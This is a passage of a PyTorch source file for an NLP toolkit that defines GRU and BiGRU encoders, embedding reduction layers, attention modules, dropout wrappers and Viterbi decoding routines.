class BiLSTMEncoderHiddenContext(BiLSTMEncoderBase):
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
tbc, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return self.extract_top_state(concat_state_dirs(hidden))
class GRUEncoderBase(nn.Module):
"""The GRU encoder is a base for a set of encoders producing various outputs.
All GRU encoders inheriting this class will trim the input to the max length given in the batch. For example,
if the input sequence is `[B, T, C]` and the `S = max(lengths)` then the resulting sequence, if produced, will
be length `S` (or more precisely, `[B, S, H]`)
*PyTorch Note*: In PyTorch, its more common for the input shape to be temporal length first (`[T, B, H]`) and this
is the PyTorch default. There is an extra parameter in all of these models called `batch_first` which controls this.
Currently, the default is time first (`batch_first=False`), which differs from TensorFlow. To match the TF impl,
set `batch_first=True`.
*PyTorch Note*:
Most `GRUEncoder` variants just define the `forward`. This module cannot provide the same utility as the
TensorFlow `GRUEncoder` base right now, because because the JIT isnt handling subclassing of forward properly.
"""
def __init__(
self,
insz: int,
hsz: int,
nlayers: int,
pdrop: float = 0.0,
requires_length: bool = True,
batch_first: bool = False,
unif: float = 0,
initializer: str = None,
**kwargs,
):
"""Produce a stack of GRUs with dropout performed on all but the last layer.
:param insz: The size of the input
:param hsz: The number of hidden units per GRU
:param nlayers: The number of layers of GRUs to stack
:param pdrop: The probability of dropping a unit value during dropout, defaults to 0
:param requires_length: Does this encoder require an input length in its inputs (defaults to `True`)
:param batch_first: PyTorch only! Should we do batch first input or time-first input? Defaults to `False` (differs from TF!)
:param unif: PyTorch only! Initialization parameters for RNN
:param initializer: PyTorch only! A string describing optional initialization type for RNN
"""
super().__init__()
self.requires_length = requires_length
self.batch_first = batch_first
self.nlayers = nlayers
if nlayers == 1:
pdrop = 0.0
self.rnn = torch.nn.GRU(insz, hsz, nlayers, dropout=pdrop, bidirectional=False, batch_first=batch_first)
if initializer == "ortho":
nn.init.orthogonal_(self.rnn.weight_ih_l0)
nn.init.orthogonal_(self.rnn.weight_hh_l0)
elif initializer == "he" or initializer == "kaiming":
nn.init.kaiming_uniform_(self.rnn.weight_ih_l0)
nn.init.kaiming_uniform_(self.rnn.weight_hh_l0)
elif unif > 0:
for weight in self.rnn.parameters():
weight.data.uniform_(-unif, unif)
else:
nn.init.xavier_uniform_(self.rnn.weight_ih_l0)
nn.init.xavier_uniform_(self.rnn.weight_hh_l0)
self.output_dim = hsz
def extract_top_state(self, state: torch.Tensor) -> torch.Tensor:
return state[-1]
class GRUEncoderSequence(GRUEncoderBase):
"""GRU encoder to produce the transduced output sequence.
Takes a tuple of tensor, shape `[B, T, C]` and a lengths of shape `[B]` and produce an output sequence of
shape `[B, S, H]` where `S = max(lengths)`. The lengths of the output sequence may differ from the input
sequence if the `max(lengths)` given is shorter than `T` during execution.
*PyTorch Note:* The input shape of is either `[B, T, C]` or `[T, B, C]` depending on the value of `batch_first`,
and defaults to `[T, B, C]` for consistency with other PyTorch modules. The output shape is of the same orientation.
"""
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""Take in a tuple of the sequence tensor `[T, B, H]` or `[B, T, H]` and its length, produce output sequence
:param inputs: A tuple of the sequence tensor and its length
:return: A sequence tensor of shape `[T, B, H]` or `[B, T, H]`
"""
tbc, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return output
class GRUEncoderAll(GRUEncoderBase):
"""GRU encoder that passes along the full output and hidden states for each layer
Takes a tuple containing a tensor input of shape `[B, T, C]` and lengths of shape `[B]`
This returns a 2-tuple of outputs `[B, S, H]` where `S = max(lengths)`, for the output vector sequence,
and a hidden vector `[L, B, H]`
*PyTorch note*: Takes a vector of shape `[B, T, C]` or `[B, C, T]`, depending on input specification
of `batch_first`. Also note that in PyTorch, this defaults to `True`
"""
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
"""
:param inputs: A tuple containing the input tensor `[B, T, C]` or `[B, H, C]` and a length `[B]`
:return: An output tensor `[B, S, H]` or `[B, H, S]` , and a hidden tensor `[L, B, H]`
"""
tbc, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return output, hidden
class GRUEncoderHidden(GRUEncoderBase):
"""GRU encoder that returns the top hidden state
Takes a tuple containing a tensor input of shape `[B, T, C]` and lengths of shape `[B]` and
returns a hidden unit tensor of shape `[B, H]`
*PyTorch note*: Takes a vector of shape `[B, T, C]` or `[B, C, T]`, depending on input specification
of `batch_first`. Also note that in PyTorch, this defaults to `True`
"""
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""
:param inputs: A tuple containing the input tensor `[B, T, C]` or `[B, H, C]` and a length `[B]`
:return: An output tensor of shape `[B, H]` representing the last RNNs hidden state
"""
tbc, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return self.extract_top_state(hidden)
class BiGRUEncoderBase(nn.Module):
"""BiGRU encoder base for a set of encoders producing various outputs.
All BiGRU encoders inheriting this class will trim the input to the max length given in the batch. For example,
if the input sequence is `[B, T, C]` and the `S = max(lengths)` then the resulting sequence, if produced, will
be length `S` (or more precisely, `[B, S, H]`). Because its bidirectional, half of the hidden units given in the
constructor will be applied to the forward direction and half to the backward direction, and these will get
concatenated.
*PyTorch Note*: In PyTorch, its more common for the input shape to be temporal length first (`[T, B, H]`) and this
is the PyTorch default. There is an extra parameter in all of these models called `batch_first` which controls this.
Currently, the default is time first (`batch_first=False`), which differs from TensorFlow. To match the TF impl,
set `batch_first=True`.
*PyTorch Note*:
Most `BiGRUEncoder` variants just define the `forward`. This module cannot provide the same utility as the
TensorFlow `BiGRUEncoder` base right now, because because the JIT isnt handling subclassing of forward properly.
"""
def __init__(
self,
insz: int,
hsz: int,
nlayers: int,
pdrop: float = 0.0,
requires_length: bool = True,
batch_first: bool = False,
unif: float = 0,
initializer: str = None,
**kwargs,
):
"""Produce a stack of GRUs with dropout performed on all but the last layer.
:param insz: The size of the input
:param hsz: The number of hidden units per BiGRU (`hsz//2` used for each direction and concatenated)
:param nlayers: The number of layers of BiGRUs to stack
:param pdrop: The probability of dropping a unit value during dropout, defaults to 0
:param requires_length: Does this encoder require an input length in its inputs (defaults to `True`)
:param batch_first: Should we do batch first input or time-first input? Defaults to `False` (differs from TF!)
:param unif: PyTorch only! Initialization parameters for RNN
:param initializer: PyTorch only! A string describing optional initialization type for RNN
"""
super().__init__()
self.requires_length = requires_length
self.batch_first = batch_first
self.nlayers = nlayers
if nlayers == 1:
pdrop = 0.0
self.rnn = torch.nn.GRU(insz, hsz // 2, nlayers, dropout=pdrop, bidirectional=True, batch_first=batch_first)
if initializer == "ortho":
nn.init.orthogonal(self.rnn.weight_hh_l0)
nn.init.orthogonal(self.rnn.weight_ih_l0)
elif initializer == "he" or initializer == "kaiming":
nn.init.kaiming_uniform(self.rnn.weight_hh_l0)
nn.init.kaiming_uniform(self.rnn.weight_ih_l0)
elif unif > 0:
for weight in self.rnn.parameters():
weight.data.uniform_(-unif, unif)
else:
nn.init.xavier_uniform_(self.rnn.weight_hh_l0)
nn.init.xavier_uniform_(self.rnn.weight_ih_l0)
self.output_dim = hsz
def extract_top_state(self, state: torch.Tensor) -> torch.Tensor:
# Select the topmost state with -1 and the only direction is forward (select with 0)
return state[-1]
# TODO: normalize across backends or remove
class BiGRUEncoderSequenceHiddenContext(BiGRUEncoderBase):
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
tbc, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return output, self.extract_top_state(_cat_dir(hidden))
class BiGRUEncoderAll(BiGRUEncoderBase):
"""BiGRU encoder that passes along the full output and hidden states for each layer
Takes a tuple containing a tensor input of shape `[B, T, C]` and lengths of shape `[B]`
This returns a 2-tuple of outputs `[B, S, H]` where `S = max(lengths)`, for the output vector sequence,
and a hidden vector `[L, B, H]`
*PyTorch note*: Takes a vector of shape `[B, T, C]` or `[B, C, T]`, depending on input specification
of `batch_first`. Also note that in PyTorch, this defaults to `True`
"""
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
"""
:param inputs: A tuple containing the input tensor `[B, T, C]` or `[B, H, C]` and a length `[B]`
:return: An output tensor `[B, S, H] or `[B, H, S]` , and a hidden vector `[L, B, H]`
"""
tbc, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return output, _cat_dir(hidden)
class BiGRUEncoderSequence(BiGRUEncoderBase):
"""BiGRU encoder to produce the transduced output sequence.
Takes a tuple of tensor, shape `[B, T, C]` and a lengths of shape `[B]` and produce an output sequence of
shape `[B, S, H]` where `S = max(lengths)`. The lengths of the output sequence may differ from the input
sequence if the `max(lengths)` given is shorter than `T` during execution.
*PyTorch Note:* The input shape of is either `[B, T, C]` or `[T, B, C]` depending on the value of `batch_first`,
and defaults to `[T, B, C]` for consistency with other PyTorch modules. The output shape is of the same orientation.
"""
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""Take in a tuple of `(sequence, lengths)` and produce and output tensor of the last layer of GRUs
The value `S` here is defined as `max(lengths)`, `S <= T`
:param inputs: sequence of shapes `[B, T, C]` or `[T, B, C]` and a lengths of shape `[B]`
:return: A tensor of shape `[B, S, H]` or `[S, B, H]` depending on setting of `batch_first`
"""
tbc, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return output
class BiGRUEncoderHidden(BiGRUEncoderBase):
"""GRU encoder that returns the top hidden state
Takes a tuple containing a tensor input of shape `[B, T, C]` and lengths of shape `[B]` and
returns a hidden unit tensor of shape `[B, H]`
*PyTorch note*: Takes a vector of shape `[B, T, C]` or `[B, C, T]`, depending on input specification
of `batch_first`. Also note that in PyTorch, this defaults to `True`
"""
def forward(self, inputs):
"""
:param inputs: A tuple containing the input tensor `[B, T, C]` or `[B, H, C]` and a length `[B]`
:return: An output tensor of shape `[B, H]` representing the last RNNs hidden state
"""
tbc, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return self.extract_top_state(_cat_dir(hidden))
class Reduction(nn.Module):
def __init__(self):
super().__init__()
def forward(self, inputs: List[torch.Tensor]) -> torch.Tensor:
pass
def set_output_dim(self, output_dims: List[int]):
pass
class ConcatReduction(Reduction):
def __init__(self, output_dims: List[int], axis=-1, **kwargs):
super().__init__()
self.axis = axis
self.set_output_dim(output_dims)
def set_output_dim(self, output_dims: List[int]):
self.output_dim = sum(output_dims)
def forward(self, inputs: List[torch.Tensor]) -> torch.Tensor:
return torch.cat(inputs, self.axis)
class ConcatSubtractReduction(Reduction):
"""This reduction assumes paired input and subtracts the two to get a distance
It is useful for training sentence encoders and is used, for example, in SentenceBERT
For this to work we assume that the inputs are paired, and subtract them
"""
def __init__(self, output_dims: List[int], axis=-1, **kwargs):
super().__init__()
self.axis = axis
self.set_output_dim(output_dims)
def set_output_dim(self, output_dims: List[int]):
self.output_dim = 3 * output_dims[0]
def forward(self, inputs: List[torch.Tensor]) -> torch.Tensor:
sub = torch.abs(inputs[0] - inputs[1])
return torch.cat([inputs[0], inputs[1], sub], self.axis)
class SumReduction(Reduction):
def __init__(self, output_dims: List[int], **kwargs):
super().__init__()
self.set_output_dim(output_dims)
def set_output_dim(self, output_dims: List[int]):
# We could actually project if we needed, or at least should validate
self.output_dim = output_dims[0]
def forward(self, inputs: List[torch.Tensor]) -> torch.Tensor:
return sum(inputs)
class SumLayerNormReduction(Reduction):
def __init__(self, output_dims: List[int], layer_norm_eps: float = 1.0e-12, **kwargs):
super().__init__()
self.set_output_dim(output_dims)
self.ln = nn.LayerNorm(self.output_dim, eps=layer_norm_eps)
def set_output_dim(self, output_dims: List[int]):
self.output_dim = output_dims[0]
def forward(self, inputs: List[torch.Tensor]) -> torch.Tensor:
output = sum(inputs)
return self.ln(output)
class EmbeddingsStack(nn.Module):
def __init__(
self,
embeddings_dict: Dict[str, nn.Embedding],
dropout_rate: float = 0.0,
requires_length: bool = False,
reduction: Optional[Union[str, nn.Module]] = 'concat',
**kwargs,
):
"""Takes in a dictionary where the keys are the input tensor names, and the values are the embeddings
:param embeddings_dict: dictionary of each feature embedding
:param dropout_rate: The dropout rate (0.0 means no dropout, 1.0 means complete)
"""
super().__init__()
self._keys: List[str] = []
embeddings_list = []
output_dims = []
for k, embedding in embeddings_dict.items():
embeddings_list.append(embedding)
self._keys.append(k)
output_dims += [embedding.get_dsz()]
self.embeddings: nn.ModuleList = nn.ModuleList(embeddings_list)
# TODO: should we make a registry of options?
if isinstance(reduction, str):
if reduction == 'sum':
self.reduction = SumReduction(output_dims)
elif reduction == 'sum-layer-norm':
self.reduction = SumLayerNormReduction(output_dims, layer_norm_eps=kwargs.get('layer_norm_eps', 1.0e-12))
elif reduction == 'concat-subtract':
self.reduction = ConcatSubtractReduction(output_dims)
else:
self.reduction = ConcatReduction(output_dims)
else:
self.reduction = reduction
self.reduction.set_output_dim(output_dims)
self.dsz = self.reduction.output_dim
self.dropout = nn.Dropout(dropout_rate)
self.requires_length = requires_length
def __getitem__(self, item: str) -> nn.Module:
idx = self._keys.index(item)
if idx < 0:
raise Exception(f"Invalid item ({item})")
return self.embeddings[idx]
def forward(self, inputs: Dict[str, torch.Tensor]) -> torch.Tensor:
"""This method performs "embedding" of the inputs. The base method here then concatenates along depth
dimension to form word embeddings
:return: A 3-d vector where the last dimension is the concatenated dimensions of all embeddings
"""
all_embeddings_out = []
i = 0
for embedding in self.embeddings:
k = self._keys[i]
x = inputs[k]
# Its a hair faster to do this than using isinstance
if x.__class__ == tuple:
embeddings_out = embedding(*x)
else:
embeddings_out = embedding(x)
all_embeddings_out.append(embeddings_out)
i += 1
word_embeddings = self.reduction(all_embeddings_out)
return self.dropout(word_embeddings)
def keys(self):
return self._keys
@property
def output_dim(self):
return self.dsz
def items(self):
for k, v in zip(self.keys(), self.embeddings):
yield k, v
class DenseStack(nn.Module):
"""A stack of one or more hidden layers
"""
def __init__(
self,
insz: int,
hsz: Union[int, List[int]],
activation: Union[str, List[str]] = "relu",
pdrop_value: float = 0.5,
init=None,
skip_connect=False,
layer_norm=False,
**kwargs,
):
"""Stack 1 or more hidden layers, optionally (forming an MLP)
:param insz: The number of input units
:param hsz: The number of hidden units
:param activation: The name of the activation function to use
:param pdrop_value: The dropout probability
:param init: The initializer
:param skip_connect: whether use skip connection when insz is equal to outsz for a layer
:param layer_norm: whether use layer norm in each layer
"""
super().__init__()
hszs = listify(hsz)
self.output_dim = hsz[-1]
activations = listify(activation)
if len(activations) == 1:
activations = activations * len(hszs)
if len(activations) != len(hszs):
raise ValueError("Number of activations must match number of hidden sizes in a stack!")
current = insz
layer_stack = []
if layer_norm:
layer_norm_eps = kwargs.get('layer_norm_eps', 1e-6)
for hsz, activation in zip(hszs, activations):
if skip_connect and current == hsz:
layer = SkipConnection(current, activation)
else:
layer = Dense(current, hsz, activation)
if layer_norm:
layer = nn.Sequential(layer, nn.LayerNorm(hsz, eps=layer_norm_eps))
layer_stack.append(WithDropout(layer, pdrop_value))
current = hsz
self.layer_stack = nn.Sequential(*layer_stack)
self.requires_length = False
def forward(self, inputs: torch.Tensor) -> torch.Tensor:
"""Stack 1 or more hidden layers, optionally (forming an MLP)
:param inputs: The fixed representation of the model
:Keyword Arguments:
* *hsz* -- (``int``) The number of hidden units (defaults to `100`)
:return: The final layer
"""
return self.layer_stack(inputs)
class VectorSequenceAttention(nn.Module):
def __init__(self, hsz: int):
super().__init__()
self.hsz = hsz
self.W_c = nn.Linear(2 * self.hsz, hsz, bias=False)
def forward(self, query_t, keys_bth, values_bth, keys_mask=None):
# Output(t) = B x H x 1
# Keys = B x T x H
# a = B x T x 1
a = self._attention(query_t, keys_bth, keys_mask)
attended = self._update(a, query_t, values_bth)
return attended
def _attention(self, query_t, keys_bth, keys_mask):
pass
def _update(self, a, query_t, values_bth):
# a = B x T
# Want to apply over context, scaled by a
# (B x 1 x T) (B x T x H) = (B x 1 x H)
a = a.view(a.size(0), 1, a.size(1))
c_t = torch.bmm(a, values_bth).squeeze(1)
attended = torch.cat([c_t, query_t], -1)
attended = torch.tanh(self.W_c(attended))
return attended
def dot_product_attention_weights(query_t: torch.Tensor,
keys_bth: torch.Tensor,
keys_mask: torch.Tensor) -> torch.Tensor:
a = keys_bth @ query_t.unsqueeze(2)
a = a.squeeze(2).masked_fill(keys_mask == MASK_FALSE, -1e9)
a = F.softmax(a, dim=-1)
return a
def dot_product_attention_weights_lengths(query_t: torch.Tensor,
keys_bth: torch.Tensor,
keys_lengths: torch.Tensor) -> torch.Tensor:
mask = sequence_mask(keys_lengths, keys_bth.shape[1]).to(keys_bth.device)
return dot_product_attention_weights(query_t, keys_bth, mask)
class LuongDotProductAttention(VectorSequenceAttention):
def __init__(self, hsz):
super().__init__(hsz)
def _attention(self, query_t, keys_bth, keys_mask):
return dot_product_attention_weights(query_t, keys_bth, keys_mask)
class ScaledDotProductAttention(VectorSequenceAttention):
def __init__(self, hsz):
super().__init__(hsz)
def _attention(self, query_t, keys_bth, keys_mask):
a = (keys_bth @ query_t.unsqueeze(2)) / math.sqrt(self.hsz)
a = a.squeeze(2).masked_fill(keys_mask == MASK_FALSE, -1e9)
a = F.softmax(a, dim=-1)
return a
class LuongGeneralAttention(VectorSequenceAttention):
def __init__(self, hsz):
super().__init__(hsz)
self.W_a = nn.Linear(self.hsz, self.hsz, bias=False)
def _attention(self, query_t, keys_bth, keys_mask):
a = keys_bth @ self.W_a(query_t).unsqueeze(2)
a = a.squeeze(2).masked_fill(keys_mask == MASK_FALSE, -1e9)
a = F.softmax(a, dim=-1)
return a
class BahdanauAttention(VectorSequenceAttention):
def __init__(self, hsz):
super().__init__(hsz)
self.hsz = hsz
self.W_a = nn.Linear(self.hsz, self.hsz, bias=False)
self.E_a = nn.Linear(self.hsz, self.hsz, bias=False)
self.v = nn.Linear(self.hsz, 1, bias=False)
def _attention(self, query_t, keys_bth, keys_mask):
B, T, H = keys_bth.shape
q = self.W_a(query_t.view(-1, self.hsz)).view(B, 1, H)
u = self.E_a(keys_bth).view(B, T, H)
z = torch.tanh(q + u)
a = self.v(z.view(-1, self.hsz)).view(B, T)
a = a.masked_fill(keys_mask == MASK_FALSE, -1e9)
a = F.softmax(a, dim=-1)
return a
def _update(self, a, query_t, values_bth):
query_t = query_t.view(-1, self.hsz)
# a = B x T
# Want to apply over context, scaled by a
# (B x 1 x T) (B x T x H) = (B x 1 x H) -> (B x H)
a = a.view(a.size(0), 1, a.size(1))
c_t = (a @ values_bth).squeeze(1)
# (B x 2H)
attended = torch.cat([c_t, query_t], -1)
attended = self.W_c(attended)
return attended
class FineTuneModel(nn.Module):
def __init__(self, nc, embeddings, stack_model=None):
super().__init__()
if isinstance(embeddings, dict):
self.finetuned = EmbeddingsStack(embeddings)
else:
self.finetuned = embeddings
self.stack_model = stack_model
output_dim = self.finetuned.output_dim if stack_model is None else stack_model.output_dim
self.output_layer = Dense(output_dim, nc, activation="log_softmax")
def forward(self, inputs):
base_layers = self.finetuned(inputs)
stacked = self.stack_model(base_layers) if self.stack_model is not None else base_layers
return self.output_layer(stacked)
class CompositePooling(nn.Module):
"""Composite pooling allows for multiple sub-modules during pooling to be used in parallel
"""
def __init__(self, models):
"""
Note, this currently requires that each submodel is an eight_mile model with an `output_dim` attr
"""
super().__init__()
self.models = nn.ModuleList(models)
self.output_dim = sum(m.output_dim for m in self.models)
self.requires_length = any(getattr(m, "requires_length", False) for m in self.models)
def forward(self, inputs):
inputs, lengths = tensor_and_lengths(inputs)
pooled = []
for sub_model in self.models:
if getattr(sub_model, "requires_length", False):
pooled.append(sub_model((inputs, lengths)))
else:
pooled.append(sub_model(inputs))
return torch.cat(pooled, -1)
class EmbedPoolStackModel(nn.Module):
"""This provides an idiom for classification consisting of multiple phases
In the first phase, we embed the input tensors, and subsequently pool them to
a fixed width representation. Finally, we allow multiple hidden "stacking"
layers, ultimately ending in a projection to the output space
"""
def __init__(
self,
nc: int,
embeddings: nn.Module,
pool_model: nn.Module,
stack_model: Optional[nn.Module] = None,
output_model: Optional[nn.Module] = None,
):
super().__init__()
self.embed_model = embeddings
self.pool_model = pool_model
self.stack_model = stack_model if stack_model else nn.Identity()
output_dim = self.pool_model.output_dim if stack_model is None else stack_model.output_dim
self.output_layer = Dense(output_dim, nc, activation="log_softmax") if output_model is None else output_model
def forward(self, inputs: Dict[str, torch.Tensor]):
lengths = inputs["lengths"]
embedded = self.embed_model(inputs)
embedded = (embedded, lengths)
pooled = self.pool_model(embedded)
stacked = self.stack_model(pooled)
return self.output_layer(stacked)
class PassThru(nn.Module):
def __init__(self, input_dim):
super().__init__()
self.output_dim = input_dim
def forward(self, inputs: torch.Tensor) -> torch.Tensor:
return inputs
class WithoutLength(nn.Module):
"""Wrapper layer to remove lengths from the input
"""
def __init__(self, layer: nn.Module):
super().__init__()
self.layer = layer
self.output_dim = self.layer.output_dim if hasattr(self.layer, "output_dim") else 0
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
return self.layer(inputs[0])
class WithDropout(nn.Module):
"""Wrapper for any layer that surrounds it with dropout"""
def __init__(self, layer: nn.Module, pdrop: float = 0.5, variational=False, batch_first=False):
"""Create a dropout wrapper around the given layer
:param layer: Some sort of layer
:param pdrop: A dropout value
"""
super().__init__()
self.layer = layer
self.dropout = VariationalDropout(pdrop, batch_first=batch_first) if variational else nn.Dropout(pdrop)
self.output_dim = self.layer.output_dim if hasattr(self.layer, "output_dim") else 0
def forward(self, inputs: torch.Tensor) -> torch.Tensor:
"""Apply the layer followed by dropout
:param inputs: input tensor
:return: output transformed by the held layer and subsequent dropout
"""
return self.dropout(self.layer(inputs))
class WithDropoutOnFirst(nn.Module):
"""Wrapper for any layer that surrounds it with dropout
This exists primarily for the LSTMEncoderWithState to allow dropout on the output while
passing back the hidden state
"""
def __init__(self, layer: nn.Module, pdrop: float = 0.5, variational=False):
"""Create a dropout wrapper around the given layer
:param layer: Some sort of layer
:param pdrop: A dropout value
"""
super().__init__()
self.layer = layer
self.dropout = VariationalDropout(pdrop) if variational else nn.Dropout(pdrop)
self.output_dim = self.layer.output_dim if hasattr(self.layer, "output_dim") else 0
def forward(self, inputs: Tuple[torch.Tensor]) -> torch.Tensor:
"""Apply the layer followed by dropout
:param inputs: input tensor
:return: output transformed by the held layer and subsequent dropout
"""
outputs = self.layer(inputs)
return self.dropout(outputs[0]), outputs[1]
def transition_mask(vocab, span_type, s_idx, e_idx, pad_idx=None):
"""Create a mask to enforce span sequence transition constraints.
Returns a Tensor with valid transitions as a 0 and invalid as a 1 for easy use with `masked_fill`
"""
np_mask = transition_mask_np(vocab, span_type, s_idx, e_idx, pad_idx=pad_idx)
return torch.from_numpy(np_mask) == 0
@torch.jit.script
def inplace_assign(data: torch.Tensor, index: torch.Tensor, new_data: torch.Tensor) -> torch.Tensor:
new_data = new_data.unsqueeze(0)
index = index.expand(1, new_data.size(1))
data.scatter_(0, index, new_data)
return data
@torch.jit.script
def i2t(i: int) -> torch.Tensor:
return torch.tensor(i).unsqueeze(0)
@torch.jit.script
def script_viterbi(
unary: torch.Tensor, trans: torch.Tensor, start_idx: int, end_idx: int
) -> Tuple[torch.Tensor, torch.Tensor]:
seq_len: int = unary.size(0)
num_tags: int = unary.size(1)
fill_value: float = -1e4
# dtype=unary.dtype fails, with prim_dtype error on torch 1.7.1
alphas = torch.full((num_tags,), fill_value, dtype=torch.float, device=unary.device)
broadcast_idx = torch.full((num_tags,), start_idx, dtype=torch.long)
alphas = alphas.scatter(0, broadcast_idx, torch.zeros((num_tags,)))
alphas = alphas.unsqueeze(0)
backpointers: torch.Tensor = torch.zeros(num_tags, dtype=torch.long).unsqueeze(0)
for i in range(seq_len):
unary_t = unary[i, :]
next_tag_var = alphas + trans
viterbi, best_tag_ids = torch.max(next_tag_var, 1)
backpointers = torch.cat([backpointers, best_tag_ids.unsqueeze(0)], 0)
alphas = (viterbi + unary_t).unsqueeze(0)
terminal_vars = alphas.squeeze(0) + trans[end_idx, :]
path_score, best_tag_id = torch.max(terminal_vars, 0)
best_path = best_tag_id.unsqueeze(0)
for i in range(unary.size(0)):
t = seq_len - i - 1
best_tag_id = backpointers[t + 1, best_tag_id]
best_path = torch.cat([best_path, best_tag_id.unsqueeze(0)], -1)
new_path_vec = best_path.flip(0)
return new_path_vec[1:], path_score
class ViterbiBatchSize1(nn.Module):
def __init__(self, start_idx: int, end_idx: int):
super().__init__()
self.start_idx = start_idx
self.end_idx = end_idx
def forward(self, unary: torch.Tensor, trans: torch.Tensor, _: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
unary = unary.squeeze(1)
trans = trans.squeeze(0)
path, score = script_viterbi(unary, trans, self.start_idx, self.end_idx)
return path.unsqueeze(1), score
class Viterbi(nn.Module):
def __init__(self, start_idx: int, end_idx: int):
super().__init__()
self.start_idx = start_idx
self.end_idx = end_idx
# r, start_idx: int, end_idx: int, norm = lambda x, y: x
def forward(
self, unary: torch.Tensor, trans: torch.Tensor, lengths: torch.Tensor
) -> Tuple[torch.Tensor, torch.Tensor]:
"""Do Viterbi decode on a batch.
:param unary: torch.FloatTensor: [T, B, N]
:param trans: torch.FloatTensor: [1, N, N]
:param norm: Callable: This function should take the initial and a dim to
normalize along.
:return: torch.LongTensor: [T, B] the padded paths
:return: torch.FloatTensor: [B] the path scores
"""
seq_len, batch_size, tag_size = unary.size()
min_length = torch.min(lengths)
backpointers = []
# Alphas: [B, 1, N]
alphas = torch.full((batch_size, 1, tag_size), -1e4, device=unary.device)
alphas[:, 0, self.start_idx] = 0
# alphas = self.norm(alphas)
for i, unary_t in enumerate(unary):
next_tag_var = alphas + trans
viterbi, best_tag_ids = torch.max(next_tag_var, 2)
backpointers.append(best_tag_ids)
new_alphas = viterbi + unary_t
new_alphas.unsqueeze_(1)
# This part generates a warning
if i >= min_length:
mask = (i < lengths).view(-1, 1, 1)
alphas = alphas.masked_fill(mask, 0) + new_alphas.masked_fill(mask == MASK_FALSE, 0)
else:
alphas = new_alphas
# Add end tag
terminal_var = alphas.squeeze(1) + trans[:, self.end_idx, :]
path_score, best_tag_id = torch.max(terminal_var, 1)
# Flip lengths
rev_len = seq_len - lengths - 1
best_path = [best_tag_id]
for i in range(len(backpointers)):
t = len(backpointers) - i - 1
backpointer_t = backpointers[t]
# Get new best tag candidate
new_best_tag_id = backpointer_t.gather(1, best_tag_id.unsqueeze(1)).squeeze(1)
# We are going backwards now, if flipped length was passed
# these you aren't in your real results yet
mask = i > rev_len
best_tag_id = best_tag_id.masked_fill(mask, 0) + new_best_tag_id.masked_fill(mask == MASK_FALSE, 0)
best_path.append(best_tag_id)
_ = best_path.pop()
best_path.reverse()
best_path = torch.stack(best_path)
# Mask out the extra tags (This might be pointless given thathatt anything that
# will use this as a dense tensor downstream will mask it itself?)
seq_mask = sequence_mask(lengths, seq_len).to(best_path.device).transpose(0, 1)
best_path = best_path.masked_fill(seq_mask == MASK_FALSE, 0)
return best_path, path_score
@torch.jit.script
def script_viterbi_log_softmax_norm(
unary: torch.Tensor, trans: torch.Tensor, start_idx: int, end_idx: int
) -> Tuple[torch.Tensor, torch.Tensor]:
seq_len: int = unary.size(0)
num_tags: int = unary.size(1)
fill_value: float = -1e4
# dtype=unary.dtype fails, with prim_dtype error on torch 1.7.1
alphas = torch.full((num_tags,), fill_value, dtype=torch.float, device=unary.device)
broadcast_idx = torch.full((num_tags,), start_idx, dtype=torch.long)
alphas = alphas.scatter(0, broadcast_idx, torch.zeros((num_tags,)))
alphas = alphas.unsqueeze(0)
alphas = torch.log(F.softmax(alphas, dim=-1))
backpointers: torch.Tensor = torch.zeros(num_tags, dtype=torch.long).unsqueeze(0)
for i in range(seq_len):
unary_t = unary[i, :]
next_tag_var = alphas + trans
viterbi, best_tag_ids = torch.max(next_tag_var, 1)
backpointers = torch.cat([backpointers, best_tag_ids.unsqueeze(0)], 0)
alphas = (viterbi + unary_t).unsqueeze(0)
terminal_vars = alphas.squeeze(0) + trans[end_idx, :]
path_score, best_tag_id = torch.max(terminal_vars, 0)
best_path = best_tag_id.unsqueeze(0)
for i in range(unary.size(0)):
t = seq_len - i - 1
best_tag_id = backpointers[t + 1, best_tag_id]
